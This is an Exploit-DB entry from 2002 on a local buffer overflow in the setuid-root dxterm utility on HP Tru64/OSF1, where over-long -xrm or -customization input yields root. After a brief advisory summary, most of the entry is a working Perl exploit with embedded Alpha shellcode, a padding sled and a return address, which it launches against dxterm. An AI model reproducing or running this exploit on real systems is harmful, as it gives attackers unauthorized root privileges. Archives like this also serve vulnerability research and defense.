HP Tru64/OSF1 DXTerm - Local Buffer Overflow

EDB-ID:

21807


Author:

stripey

Type:

local


Platform:

Unix

Date:

2002-07-03


source: https://www.securityfocus.com/bid/5746/info

The HP Tru64/OSF1 dxterm utility is prone to a locally exploitable buffer overflow condition. This issue is due to insufficient checking of command line input supplied via the "-xrm" parameter. This parameter serves the same purpose as the "-customization" command line parameter, which is also not sufficiently checked. 

Since this utility is installed setuid root, code execution that results from successful exploitation of this issue will yield root privileges on the system.

#!/usr/bin/perl -w
#
# Tru64 5.1 /usr/bin/X11/dxterm
#
# stripey (stripey@snosoft.com) - 03/07/2002
#

($offset) = @ARGV,$offset || ($offset = 0);

$ret_addr = pack("ll",(0x4001c828+$offset),0x1);

$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";

$buf_a .= pack("l",0x47ff041f)x2048;
$buf_a .= $sc;
$buf_a .= $ret_addr;

exec("/usr/bin/X11/dxterm","-customization",$buf_a);